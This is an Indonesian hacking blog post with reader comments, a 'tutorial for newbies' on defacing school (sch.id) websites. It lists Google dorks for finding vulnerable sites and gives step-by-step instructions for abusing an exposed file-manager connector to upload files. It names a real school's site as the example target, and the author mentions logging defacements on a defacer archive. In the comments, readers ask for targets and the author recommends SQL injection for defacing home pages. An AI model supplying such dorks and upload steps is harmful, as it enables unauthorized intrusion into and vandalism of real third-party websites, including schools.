• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Cara Mudah Deface Situs sch.id | Tutorial for Newbie

January 15, 2013 by Jack Wilder 37 Comments

Cara Mudah Deface Situs sch.id. Sebenarnya ini cara yang lumayan lama. Namun karena mentok nggak ada bahan postingan, iseng-iseng tadi nambah list deface di indonesiandefacer.org pake cara ini. Mau pake SQLi, males. Kadang discan pake Havij udah nemu password sama usernya malah halaman buat loginnya gak ketemu.
Yaudah, pake cara ini saja. cara ini bisa dibilang cara yang paling mudah karena kita tidak perlu masuk lewat pintu depan/admin. Dan sekalian mau share di blog.

Alat
Google dork :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?

File dengan format txt :
Terserah mau diisi apa. Boleh diisi puisi, misuh-misuh (jangan ding !), atau nomer hape (ini sih orang lebay) . pokoknya terserah deh !!!

langkah-langkah :
1. Masukkan dork diatas di kotak pencarian google.
2. Pilih salah satu situs yang muncul. disini saya ambil contoh : http://www.sman1gombong.sch.id/html/alumni.php
3. Ganti urlnya menjadi editor http://www.sman1gombong.sch.id/filemanager/connectors/test.html
4. Pada opsi connector, pilih PHP. lalu upload file txt milik kamu.
5. Untuk membuka hasilnya, exploitnya adalah http://site.sch.id/userfiles/file/namafile.txt . Jadi untuk contoh saya menjadi http://www.sman1gombong.sch.id/userfiles/file/Wonderk-ID.txt

Selesai !!
Mudah kan ???

Sekian tutorial kali ini. Semoga bermanfaat.

Shares

Filed Under: Uncategorized Tagged With: Hacking, Underground

Reader Interactions

Comments

  1. wahyu di says

    January 15, 2013 at 7:06 pm

    wah mantab Gan. bungkus dulu ia Gan, mau praktek dah malem bngt. besok langsung praktek Gan.
    makasih ilmunya met mlm Gan 🙂

    Reply
    • chiaki says

      January 15, 2013 at 9:59 pm

      Iya. Hehehe

      Reply
  2. Xi Game says

    January 16, 2013 at 12:22 am

    menarik sekali tapi ane gak ikutan gan 😀

    Reply
    • chiaki says

      January 16, 2013 at 12:30 am

      Iya. Hehehe

      Reply
  3. Masnady says

    January 16, 2013 at 1:41 am

    oh gitu to caranya…? terimakasih sobat atas penjelasan dan tutorialnya…?

    sayang nih saya pake hp, sedikit kerepotan kalau mau praktek wkwkwkwkwkwkwkw

    Reply
    • chiaki says

      January 16, 2013 at 1:59 am

      Oke sob. Hehehe

      Reply
  4. budi os 19 says

    January 16, 2013 at 2:35 am

    Hehe…ga ngerti…nih yud…fungsi nya buat apaan ya… 🙂
    Payah ya saya… 😀

    Reply
    • chiaki says

      January 16, 2013 at 2:41 am

      Buat yang bener2 cupu pengen belajar defacing. Hehehe

      Reply
  5. deby putra bahrodin says

    January 16, 2013 at 3:11 am

    dosa mas dosa … nanti di cari sama pak kapolri loh .. hehehe ..

    itu cara yang simple tapi apakah 100% work mas?

    Reply
    • chiaki says

      January 16, 2013 at 3:32 am

      Ini gk ngerusak database . Cuma upload file. Tingkat keberhasilan 95% . :p

      Reply
  6. Muro'i El-Barezy says

    January 16, 2013 at 3:15 am

    WOKEH MUDAH BANGET SOB, trims pisan sharingnya happy blogging sob

    Reply
    • chiaki says

      January 16, 2013 at 4:56 am

      Sama-sama

      Reply
  7. wahyu di says

    January 16, 2013 at 3:32 am

    hehehehhe singgah lagi nie Gan, makasih atas usulnya Gan….!!
    kalo ada waktu bole di coba lg,vrivikasi katanya masih pa gak,heee???
    met pagi,sukses selalu Gan….!!

    Reply
    • chiaki says

      January 17, 2013 at 12:50 am

      Iya sob. Hehehe

      Reply
  8. cik awi says

    January 16, 2013 at 4:17 am

    Walah saya malah baru tau tentang hal ini sobat… Maklum ketinggalan kereta… Dan perlu registrasi dulu atau kagak itu sob?

    Reply
    • chiaki says

      January 17, 2013 at 12:52 am

      Nggak perlu sob. . . Lewat upload. Hehehe

      Reply
  9. Brebes VS Lamongan says

    January 16, 2013 at 6:18 am

    met siang mas waduh mancap,ni mas trmksih banyak mas dah berbagi

    Reply
    • chiaki says

      January 17, 2013 at 12:57 am

      Oke sob. . .

      Reply
  10. inblogspot.com says

    January 16, 2013 at 8:11 am

    Wah keren gan bisa deface web sekolahan..

    Reply
    • chiaki says

      January 17, 2013 at 12:58 am

      Hehehe. . Maklum, newbie. :p

      Reply
  11. Achmad Muharya says

    January 16, 2013 at 10:40 am

    kalo ke homepage masih bisa masuk tuh mas o.O

    maklumlah masih belum terlalu mengerti samahal ini…

    Reply
    • chiaki says

      January 16, 2013 at 4:03 pm

      Kalo mau mepes home nya pake sql injection masbro. 😀

      Reply
  12. Masnady says

    January 16, 2013 at 2:37 pm

    datang lagi sobat untuk menginformasikan bahwa link sobat sudah saya kibarkan di blog saya.

    saya harap sobat juga bersedia mengibarkan link blog saya di sini.

    semoga persahabatan kita makin erat sob…..

    Reply
    • chiaki says

      January 17, 2013 at 12:52 am

      Oke sudah. Hehehe

      Reply
  13. Bung Penho says

    January 16, 2013 at 5:45 pm

    masih bingung!. ini sebenarnya buat apa'an ya?

    Reply
    • chiaki says

      January 17, 2013 at 12:51 am

      Buat latian deface bung. 😀

      Reply
  14. OkkyGeorgeous says

    February 11, 2013 at 12:07 pm

    GAn mau tanya ??
    Google dork itu apa dan fungsinya apa?
    secara simple aja baca di google malah mumet!!

    Reply
  15. Anonim says

    March 16, 2013 at 7:36 am

    maksudnya 'ganti url jadi editor' tuh apa ?

    Reply
  16. suminar apriyanto says

    March 31, 2013 at 1:30 pm

    minta target sob.
    Was not found on this server terus sob.

    Reply
    • chiaki says

      April 14, 2013 at 11:48 pm

      Pake target saya diatas.

      Reply
  17. mas ihsan says

    April 17, 2013 at 4:48 pm

    kalau pake hp bisa gak cak

    Reply
    • chiaki says

      April 29, 2013 at 10:14 pm

      bisa brooo. :v

      Reply
  18. Anonim says

    May 7, 2013 at 5:30 am

    Kurang Jelas Tuh Toritorialnya .. Yang no 3 saya gk jelas
    3. Ganti urlnya menjadi editor http://www.sman1gombong.sch.id/filemanager/connectors/test.html

    Reply
  19. Hawari Aliansyah says

    May 14, 2016 at 12:57 am

    udh gk bisa ya?

    Reply
  20. Jasa Outbound di Malang says

    July 19, 2016 at 7:29 am

    Saya senang sekali menemukan postingan anda dan bisa ikut memberi komentar menurut saya sangat berharga sekali bisa membaca tulisan anda, dan pada kesempatan ini akan saya manfaatkan untuk sumber referensi saya
    Terima kasih banyak telah berbagi, saya berharap anda terus semangat menulis topik selanjutnya
    Paket Outbound Malang
    Tempat Outbound Mojokerto
    Tempat Outbound Pasuruan
    Paket Outbound Kediri

    Reply
  21. SEBAT GAMING says

    April 1, 2017 at 7:27 am

    tolong bantu ms( itu gmana ya yg pilih PHP nya?

    Reply
  22. SEBAT GAMING says

    April 1, 2017 at 7:30 am

    tolong bantu ms( itu gmana ya yg pilih PHP nya?

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Arti dari Kata Deface yang Sering Dibahas oleh para Hacker

Exploit WPStore Themes Upload Vulnerability

Cara Deface Website dengan Teknik Local File Inclusion

Deteksi Celah No Redirect pada Suatu Situs menggunakan cURL

Command Injection Bypass Cheatsheet

bWAPP Remote File Inclusion Medium Security Level

Deface WordPress dengan Exploit WordPress TheLoft Theme Arbitrary File Download Vulnerability

Cara Deface dengan Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

Cara Mudah Hack cPanel dengan Fitur Reset Password

WordPress Army Knife CSRF File Upload Vulnerability

LinuxSec / 84 queries in 0.22 seconds